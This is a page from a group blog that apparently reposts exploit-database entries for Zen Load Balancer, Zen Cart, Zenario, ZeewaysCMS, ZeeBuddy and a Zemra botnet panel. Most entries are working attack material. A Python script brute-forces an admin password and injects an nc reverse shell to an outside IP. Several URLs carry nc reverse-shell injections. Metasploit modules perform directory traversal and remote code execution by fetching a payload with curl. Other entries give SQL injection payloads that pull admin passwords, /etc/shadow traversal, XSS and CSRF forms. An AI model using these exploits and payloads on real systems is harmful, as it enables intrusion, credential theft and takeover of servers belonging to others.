Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863118238

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Zenar Content Management System - Cross-Site Scripting
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Berk Dusunur
# Tested Website: http://demo.zenar.io
# Date: 2018-05-20
# Category: Web App

# PoC

# GET Request:

POST /zenario/ajax.php?method_call=refreshPlugin&inIframe=true HTTP/1.1
Host: demo.zenar.io
Cache-Control: no-cache
Connection: Keep-Alive
Accept: text/plain, */*; q=0.01
Origin: http://demo.zenar.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://demo.zenar.io/enquiries/newsletter-sign-up
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: PHPSESSID=27pdf3fd0plfnarmh5edk5es33
Accept-Encoding: gzip, deflate
Content-Length: 273
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

cID=25&slideId=3&cType=html&slotName=Slot_Main_2&instanceId=143&containerId=plgslt_Slot_Main_2&formPageHash=35263a7d5401cb22f77e67fb50fcdd99&reloaded=1&inFullScreen=3&field_14=netsparker%40example.com&current_page='"--></style></scRipt><scRipt>alert(EZK)</scRipt>

# Response:

<input type="hidden" name="formPageHash"
value="35263a7d5401cb22f77e67fb50fcdd99"/><input type="hidden"
name="reloaded" value="1"/><input type="hidden" name="inFullScreen"
value="1"/><fieldset
id="plgslt_Slot_Main_2_page_'"--></style></scRipt><scRipt>alert(EZK)</scRipt>"
class="page_"><div class="form_fields"></div><div
class="form_buttons"><input type="button" value=""
class="next"/></div>
HireHackking 
# Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution
# Google Dork: no
# Date: 2020-03-28
# Exploit Author: Cody Sixteen
# Vendor Homepage: https://code610.blogspot.com
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Linux 
# CVE : CVE-2019-7301

#c@kali:~/src/eonila/zenload3r$ cat zenload3r.py
#!/usr/bin/env python
# zenload3r.py - zen load balancer pwn3r
# 28.03.2020 @ 22:41
#
# by cody sixteen
#

import base64
import sys, re
import requests
import ssl
from functools import partial
ssl.wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1)
# disable ssl warnings:
import urllib3
urllib3.disable_warnings()
from requests.auth import HTTPBasicAuth

#
target = sys.argv[1]
username = 'admin'
password = 'P@ssw0rd'

def main():
  print 'zenload3r.py - zen load balancer pwn3r'
  print '      zenload3r.py - vs - %s' % ( target )
  print ''

  print '[+] checking if host is alive...'
  global sess
  sess = requests.session()
  global baseUrl
  baseUrl = target + ':444/index.cgi'
  checkBaseUrl = sess.get(baseUrl, verify=False)
  checkBaseResp = checkBaseUrl.status_code

  #print checkBaseResp
  if checkBaseResp == 401:
    print '[i] ...it is. we need to log in to proceed'
    logmein(baseUrl)


def logmein(target):
  print '[+] trying %s and default password "%s" vs %s' % (username, password, baseUrl)

  #pwd_file = '/usr/share/wordlists/dirb/common.txt'
  pwd_file = 'passwd.lst'

  try:
    read_pwds = open(pwd_file, 'r')
    pwds = read_pwds.readlines()

    for pwd in pwds:
      pwd = pwd.rstrip()
      logme = sess.post(baseUrl, auth=HTTPBasicAuth(username,pwd), allow_redirects=True)
      logmeresp = logme.text

      #print logmeresp
      if '<p>Hello <strong>admin</strong>' in logmeresp:
        print '[+] admin user logged-in! :D'
        print '[+] working password: %s' % ( pwd )

        load3r(baseUrl, pwd)

  except requests.exceptions.ConnectionError:
    print '[-] Can not connect to remote host :C\n'


def load3r(baseUrl, pwd):
  print '[+] time to get reverse shell, preparing...'

  creds = base64.b64encode("{}:{}".format(username,pwd))
  creds2 = creds.rstrip()
  print 'creds: ', creds2

  baseUrl = "https://192.168.1.200:444/index.cgi"
  headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://192.168.1.200:444",
    "Authorization": "Basic {}".format(creds2), "Connection": "close",
    "Referer": "https://192.168.1.200:444/index.cgi?id=1-3&action=Show_Form", "Upgrade-Insecure-Requests": "1"
  }
  sh = "a\";nc 192.168.1.170 4444 -e /bin/sh;#"
  reqdata = {"cert_name": "qweqweqwe", "cert_issuer": "Sofintel",
    "cert_fqdn": "qweqweqwe", "cert_division": "qweqweqwe",
    "cert_organization": sh,
    "cert_locality": "qweqweqwe", "cert_state": "qweqweqwe",
    "cert_country": "qw", "cert_mail": "qweqweqwe@qweqweqwe.com",
    "cert_key": "2048", "id": "1-3", "actionpost": "Generate CSR", "button": "Generate CSR"}

  requests.post(baseUrl, headers=headers, data=reqdata,verify=False)

  print '[*] got r00t? ;>\n'


# run me:
if __name__ == '__main__':
  main()
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Zen Load Balancer Directory Traversal",
      'Description'    => %q{
          This module exploits a authenticated directory traversal
vulnerability in Zen Load
          Balancer `v3.10.1`. The flaw exists in 'index.cgi' not
properly handling 'filelog='
          parameter which allows a malicious actor to load arbitrary file path.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Basim Alabdullah', # Vulnerability discovery
          'Dhiraj Mishra'     # Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '48308']
        ],
      'DisclosureDate' => "Apr 10 2020"
    ))

    register_options(
      [
        Opt::RPORT(444),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptInt.new('DEPTH', [true, 'The max traversal depth', 16]),
        OptString.new('FILEPATH', [false, 'The name of the file to
download', '/etc/passwd']),
        OptString.new('TARGETURI', [true, "The base URI path of the
ZenConsole install", '/']),
        OptString.new('HttpUsername', [true, 'The username to use for
the HTTP server', 'admin']),
        OptString.new('HttpPassword', [false, 'The password to use for
the HTTP server', 'admin'])
      ])
  end

  def run_host(ip)
    filename = datastore['FILEPATH']
    traversal = "../" * datastore['DEPTH']

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.cgi'),
      'vars_get'=>
      {
        'id'      => '2-3',
        'filelog' => "#{traversal}#{filename}",
        'nlines'  => '100',
        'action'  => 'See logs'
      },
      'authorization' =>
basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
      }, 25)

    unless res && res.code == 200
      print_error('Nothing was downloaded')
      return
    end

    print_good("#{peer} - Downloaded #{res.body.length} bytes")
    path = store_loot(
      'zenload.http',
      'text/plain',
      ip,
      res.body,
      filename
    )
    print_good("File saved in: #{path}")
  end
end
HireHackking 
# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Date: 2020-04-10
# Exploit Author: Basim Alabdullah
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Debian8u2
#
# Technical Details:
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
#
# Impact:
# --------
# Successful exploitation could allow an attacker to obtain sensitive
# information.

import requests
import sys

if len(sys.argv) <2:
    print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
    sys.exit(-1)
else:
    files=sys.argv[2]
    url=sys.argv[1]    
    with requests.session() as s:
        urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
        response = s.get(urlz, auth=('admin', 'admin'), verify=False)
        txt=response.text
        print(response.text)
HireHackking 
source: https://www.securityfocus.com/bid/55638/info

ZEN Load Balancer is prone to the following security vulnerabilities:

1. Multiple arbitrary command-execution vulnerabilities
2. Multiple information-disclosure vulnerabilities
3. An arbitrary file-upload vulnerability

An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive-information.

ZEN Load Balancer 2.0 and 3.0 rc1 are vulnerable. 

http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/bash;&nlines=1&action=See+logs
http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs
http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up!
http://www.example.com/config/global.conf
http://www.example.com/backup/
HireHackking 
source: https://www.securityfocus.com/bid/50787/info

Zen Cart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Zen Cart 1.3.9h is vulnerable; other versions may also be affected. 

GET: https://www.example.com/index.php?main_page=gv_send&action=send
POST: message=&lt;/textarea&gt;<script>alert("XSS");</script><textarea> 

line 72: echo &#039;<br /><strong>TESTING INFO:</strong> Time page: <strong>&#039; . $_GET[&#039;main_page&#039;] . &#039;</strong> was loaded is: <strong>&#039; . date(&#039;H:i:s&#039;, time()) . &#039;</strong><br /><br />&#039;;
...
line 75: echo "GLOBALS[$main_page] and HTTP_GET_VARS[&#039;main_page&#039;] and _GET[&#039;main_page&#039;] = " . $GLOBALS[&#039;main_page&#039;] . &#039; - &#039; . $HTTP_GET_VARS[&#039;main_page&#039;] . &#039; - &#039; . $_GET[&#039;main_page&#039;] . &#039;<br /><br />&#039;;
...
line 76: echo "_SERVER[&#039;PHP_SELF&#039;] and _GET[&#039;PHP_SELF&#039;] and PHP_SELF and _SESSION[&#039;PHP_SELF&#039;] = " . $_SERVER[&#039;PHP_SELF&#039;] . &#039; - &#039; . $_GET[&#039;PHP_SELF&#039;] . &#039; - &#039; . $PHP_SELF . &#039; - &#039; . $_SESSION[&#039;PHP_SELF&#039;] . &#039;<br /><br />&#039;;
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
#
# This exploit  write payload in database and trig to command
# a bug in an zencart v1.5.7b web application
#
###
class MetasploitModule < Msf::Exploit::Remote
    Rank = NormalRanking
  
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::Remote::HttpServer
  
    def initialize(info = {})
      super(
        update_info(
          info,
          'Name'           => 'zencart authenticated remote code execution exploit',
          'Description'    => %q(
              This exploit module execution os command in zencart.
          ),
          'License'        => MSF_LICENSE,
          'Author'         => ['Mucahit Saratar <trregen222@gmail.com>'], # msf module & research & poc
          'References'     =>[
                [ 'OSVDB', '' ],
                [ 'EDB', '' ],
                [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'],
                [ 'CVE', '2021-3291']
            ],
          'Platform'       => 'php',
          'Privileged'     => false,
          'Arch'           => ARCH_PHP,
          'Targets'        => [ ['Automatic', { }] ],
          'DisclosureDate' => '2021-01-22',
          'DefaultTarget'  => 0
        )
      )
      register_options(
        [
          Opt::RPORT(80),
          OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
          OptString.new('PASSWORD', [ true, 'Password to login with', '']),
          OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']),
          OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']),
          OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']),
          OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/'])
        ], self.class
      )
    end

    def start_server
        ssltut = false
        if datastore["SSL"]
            ssltut = true
            datastore["SSL"] = false
        end
        start_service({'Uri' => {
            'Proc' => Proc.new { |cli, req|
              on_request_uri(cli, req)
            },
            'Path' => resource_uri
        }})
        print_status("payload is on #{get_uri}")
        @adresim = get_uri
        datastore['SSL'] = true if ssltut
    end
    
    def on_request_uri(cli, request)
        print_good('First stage is executed ! Sending 2nd stage of the payload')
        send_response(cli, payload.encoded, {'Content-Type'=>'text/html'})
      end

    def tabanyol
        datastore["BASEPATH"]
    end

    def isim
        datastore["USERNAME"]
    end

    def parola
        datastore["PASSWORD"]
    end


    def login
        #"index.php?cmd=login&camefrom=index.php"
        res = send_request_cgi(
        'method'    => 'GET',
        'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
        'vars_get' => {
            'cmd' => 'login',
            'camefrom' => 'index.php'
        })
        # <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" />
        unless res
            fail_with(Failure::Unreachable, "Access web application failure")
        end
        if res.code != 200
            fail_with(Failure::Unreachable, "we not have 200 response")
        end

        if !res.get_cookies.empty?
            @cookie = res.get_cookies
            @csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
            if @csrftoken.empty?
                fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
            end
            vprint_good("login Csrf token: "+@csrftoken)
        end

        res = send_request_cgi(
            'method' => 'POST',
            'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"),
            'cookie' => @cookie,
            'vars_post' => {
                'securityToken' => @csrftoken,
                'action' => "do"+@csrftoken,
                'admin_name' => isim,
                'admin_pass' => parola
            })
            if res.code != 302
                fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
            end
            true
        end


    def check
        unless login
            fail_with(Failure::UnexpectedReply, 'Wrong credentials')
            return CheckCode::NotVulnerable('Wrong credentials')
        end
        print_good("We loged in")
        Exploit::CheckCode::Vulnerable
        CheckCode::Vulnerable('Authenticated successfully')

    end

    def exploit
        check
        start_server
        sleep(4)
        res = send_request_cgi(
            'method' => 'GET',
            'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
            'vars_get' => {
                'cmd' => 'modules',
                'set' => datastore["MODULE"],
                'module' => datastore["SETTING"],
                'action' => 'edit'
            },
            'cookie' => @cookie
        )
        if res.code != 200
            fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200')
        end
        # <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" />
        if res && res.code == 200
            @formtoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
            if @formtoken.empty?
                fail_with(Failure::UnexpectedReply, 'securitytoken not in response')
            end
            #print_good(@formtoken)
            # <form name="modules" 
            @radiolar = res.body.scan(/<input type="radio" name="configuration\[(.*)\]" value="True"/)
            @selectler = res.body.scan(/<select rel="dropdown" name="configuration\[(.*)\]" class="form-control">/)
            @textarr = res.body.scan(/<input type="text" name="configuration\[(.*)\]" value="0" class="form-control" \/>/)
            @secme = {}
            @secme["securityToken"] = @formtoken
            for @a in @radiolar
                @secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //"
            end
            for @a in @selectler
                @secme["configuration[#{@a[0]}]"] = "0"
            end
            for @a in @textarr
                @secme["configuration[#{@a[0]}]"] = "0"
            end
            print_good(@secme.to_s)
            res = send_request_cgi(
                'method' => 'POST',
                'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
                'cookie' => @cookie,
                'vars_get' => {
                    'cmd' => 'modules',
                    'set' => datastore["MODULE"],
                    'module' => datastore["SETTING"],
                    'action' => 'save'
                },
                'vars_post' => @secme
            )

            res = send_request_cgi(
                'method' => 'GET',
                'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
                'vars_get' => {
                    'cmd' => 'modules',
                    'set' => datastore["MODULE"],
                    'module' => datastore["SETTING"],
                    'action' => 'edit'
                },
                'cookie' => @cookie
            )

        end
    end
  end
HireHackking 
Advisory ID: HTB23282
Product: Zen Cart
Vendor: Zen Ventures, LLC
Vulnerable Version(s): 1.5.4
Tested Version: 1.5.4
Advisory Publication:  November 25, 2015  [without technical details]
Vendor Notification: November 25, 2015 
Vendor Patch: November 26, 2015 
Public Disclosure: December 16, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8352
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered critical vulnerability in a popular e-commerce software Zen Cart, which can be exploited by remote non-authenticated attackers to compromise vulnerable system. A remote unauthenticated attacker might be able to execute arbitrary PHP code on the target system, run arbitrary system commands, gain complete access to application's database and obtain information of all website users.

The vulnerability exists due to absence of filtration of directory traversal sequences in "act" HTTP GET parameter in "/ajax.php" script, when including local PHP files using 'require()' PHP function. A remote unauthenticated attacker can include and execute arbitrary PHP code on the target system with privileges of the web server. 

A simple exploit below will include file "/tmp/file.php" and execute its content:

http://[host]/ajax.php?method=1&act=/../../../../tmp/file


-----------------------------------------------------------------------------------------------

Solution:

Apply vendor's patch.

More Information:
https://www.zen-cart.com/showthread.php?218914-Security-Patches-for-v1-5-4-November-2015

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23282 - https://www.htbridge.com/advisory/HTB23282 - RCE in Zen Cart via Arbitrary File Inclusion
[2] Zen Cart - https://www.zen-cart.com/ - Zen Cart® truly is the art of e-commerce; free, user-friendly, open source shopping cart software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
source: https://www.securityfocus.com/bid/51968/info

Zen Cart is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.

Zen Cart 1.3.9h is vulnerable; other versions may be affected.

<form name="products" action="
http://www.example.com/path_to_admin/product.php?action=delete_product_confirm";
method="post">
<label for="securityToken">Security Token</label><br/><input type="text"
name="securityToken" value="Can be anything�" /><br/><br/>
<label for="products_id">Products ID</label><br/><input type="text"
name="products_id" value="329"><br/><br/>
<label for="product_categories[]">Products Category</label><br/><input
type="text" value="48" name="product_categories[]"><br/><br/>
<input type="submit" border="0" alt="Delete" value=" Delete Product">
</form>
HireHackking 
Zen Cart SQL Injection
Vendor: Zen Ventures, LLC
Product: Zen Cart
Version: <= 1.3.8a
Website: http://www.zen-cart.com

BID: 31023 
CVE: CVE-2008-6985 
OSVDB: 48346 
SECUNIA: 31758 
PACKETSTORM: 69640 

Description:
Zen Cart is a full featured open source ecommerce web application written in php that allows users to build, run and promote their own online store. Unfortunately there are multiple SQL Injection issues in Zen Cart that may allow an attacker to execute arbitrary SQL queries on the underlying database. This may allow for an attacker to gather username and password information, among other things. An updated version of Zen Cart has been released to address these issues and users are encouraged to upgrade as soon as possible. 


SQL Injection
There are a couple of SQL Injection issues within Zen Cart that may allow for a malicious attacker to execute arbitrary SQL queries, and gather arbitrary data from the database. The first issue is due to product attribute values not being properly sanitized (particularly the value of certain "id" parameters) when adding to or updating the shopping cart. The queries that are vulnerable to SQL injection can either be an update query, or an insert query depending on current shopping cart state and whether or not the customer is logged in. However, Zen Cart installations running with a database that supports sub selects are vulnerable to exploitation. Otherwise the issue is limited in regards to it's ability to be exploited. 

function actionMultipleAddProduct($goto, $parameters) {
  global $messageStack;
  if (is_array($_POST['products_id']) && sizeof($_POST['products_id']) > 0) {
    foreach($_POST['products_id'] as $key=>$val) {
//      while ( list( $key, $val ) = each($_POST['products_id']) ) {
      if ($val > 0) {
        $adjust_max = false;
        $prodId = $key;
        $qty = $val;
        $add_max = zen_get_products_quantity_order_max($prodId);
        $cart_qty = $this->in_cart_mixed($prodId);

The above code comes from the actionMultipleAddProduct function in the shopping_cart class, and unlike the first issue I discussed introduces a highly exploitable SQL Injection issue in to Zen Cart. The root of the problem is that the in_cart_mixed function uses $prodId in a query without any sanitation. 
products_id[-99' UNION SELECT  IF(SUBSTRING(admin_pass,1, 1) = CHAR(97), BENCHMARK
(1000000, MD5(CHAR(1))), null),2 FROM zencart_admin/*]

It's possible for an attacker to submit a request to the "multiple_products_add_product" action with a products_id like the one above (remember to set the value to one if you wish to test this) and successfully enumerate database contents based on query response time. Of course other attacks may be possible also depending on server configuration. For example, if an attacker select INTO OUTFILE then this issue can allow for remote php code execution. 


Solution:
The Zen Cart developers were very prompt and professional in releasing a fix for the previously mentioned issues. An updated version, as well as patches can be found at the following location. 

http://www.zen-cart.com/forum/showthread.php?p=604473 


Credits:
James Bercegay of the GulfTech Security Research Team
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Zemra Botnet CnC Web Panel Remote Code Execution',
      'Description'    => %q{
        This module exploits the CnC web panel of Zemra Botnet which contains a backdoor
        inside its leaked source code. Zemra is a crimeware bot that can be used to
        conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jay Turla <@shipcod3>', #Metasploit Module
          'Angel Injection', #Initial Discovery (PoC from Inj3ct0r Team)
          'Darren Martyn <@info_dox>' #Initial Discovery
        ],
      'References'     =>
        [
          ['URL', 'http://0day.today/exploit/19259'],
          ['URL', 'http://insecurety.net/?p=144'], #leaked source code and backdoor intro
          ['URL', 'http://www.symantec.com/connect/blogs/ddos-attacks-zemra-bot']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 10000,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['zemra panel / Unix', { 'Platform' => 'unix' } ],
          ['zemra panel / Windows', { 'Platform' => 'win' } ]
        ],
      'DisclosureDate' => 'Jun 28 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI',[true, "The path of the backdoor inside Zemra Botnet CnC Web Panel", "/Zemra/Panel/Zemra/system/command.php"]),
      ],self.class)
  end

  def check
    txt = Rex::Text.rand_text_alpha(8)
    http_send_command(txt)
    if res && res.body =~ /cmd/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def http_send_command(cmd)
    uri = normalize_uri(target_uri.path.to_s)
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'             => uri,
      'vars_get'        =>
        {
          'cmd' => cmd
        }
    })
    unless res && res.code == 200
      fail_with(Failure::Unknown, 'Failed to execute the command.')
    end
    res
  end

  def exploit
    http_send_command(payload.encoded)
  end
end
HireHackking 
ZeewaysCMS Multiple Vulnerabilities


[Software]

- ZeewaysCMS


[Vendor Product Description]

- ZeewaysCMS is a Content Management System and a complete Web & Mobile Solution developed by Zeeways for Corporates, 
Individuals or any kind of Business needs.


- Site: http://www.zeewayscms.com/


[Advisory Timeline]

[25.03.2016] Vulnerability discovered.
[25.03.2016] Vendor contacted.
[29.03.2016] Follow up with the vendor.
[29.03.2016] Vendor responded asking for details.
[29.03.2016] Advisory and details sent to the vendor.
[06.04.2016] Follow up with the vendor. No response received.
[06.05.2016] Public security advisory released.


[Bug Summary]

- Directory Traversal

- Cross Site Scripting (Stored)


[Impact]

- High


[Affected Version]

- Unknown


[Tested on]

- Apache/2.2.27
- PHP/5.4.28


[Advisory]

- ID: ZSL-2016-5319
- URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5319.php


[Bug Description and Proof of Concept]

- ZeewaysCMS suffers from a file inclusion vulnerability (LFI) when encoded input passed thru the 'targeturl' GET 
parameter is not properly verified before being used to include files. This can be exploited to include files from 
local resources with directory traversal attacks and URL encoded NULL bytes.
https://en.wikipedia.org/wiki/Directory_traversal_attack

- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed 
via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to 
execute arbitrary HTML and script code in a user's browser session in context of an affected site.
https://en.wikipedia.org/wiki/Cross-site_scripting


[Proof-of-Concept]

1. Directory Traversal:

http://localhost/demo//createPDF.php?targeturl=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=&&pay_id=4&&type=actual
Parameters: targeturl (GET)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2. Cross Site Scripting (Stored)

http://localhost/demo/profile
Parameters: screen_name, f_name, l_name, uc_email, uc_mobile, user_contact_num (POST)

Payload(s):
Content-Disposition: form-data; name="screen_name"

"><script><<imgIMG SRC=oi onerror=JaVaScript:alert(1)>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

All flaws described here were discovered and researched by:

Bikramaditya Guha aka "PhoenixX"
HireHackking 
# Exploit Title: Zeeways Matrimony CMS - SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/matrimony-cms/4/productdetail
# Demo Site: http://www.zeewayscms.com/matrimony/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: up_cast (POST)
Payload:  (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(117),CHAR(82),CHAR(120),CHAR(106),CHAR(69),CHAR(48),CHAR(117),CHAR(107)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: s_mother (GET)
Payload: (select 1 and row(1%2C1)>(select
count(*)%2Cconcat(concat(CHAR(52)%2CCHAR(67)%2CCHAR(117)%2CCHAR(113)%2CCHAR(82)%2CCHAR(106)%2CCHAR(97)%2CCHAR(51)%2CCHAR(113)%2CCHAR(122)%2CCHAR(116))%2Cfloor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))


----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/profile_list?s_mother=1
Vulnerable Parameter: s_religion (POST)
Payload: (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(86),CHAR(74),CHAR(77),CHAR(54),CHAR(109),CHAR(84),CHAR(73)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))
HireHackking 
# Exploit Title: Zeeways Jobsite CMS - 'id' SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/jobsite-cms/1/productdetail
# Demo Site: http://www.zeewayscms.com/jobsite/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/news_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/jobs_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/job_cmp_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#
HireHackking 
# # # # # 
# Exploit Title: ZeeBuddy 2x - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.zeescripts.com/
# Software Link: http://www.zeebuddy.com/
# Demo: http://www.zeebuddy.com/demo/
# Version: 2x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15976
# # # # #
# Exploit Author: Ihsan Sencan
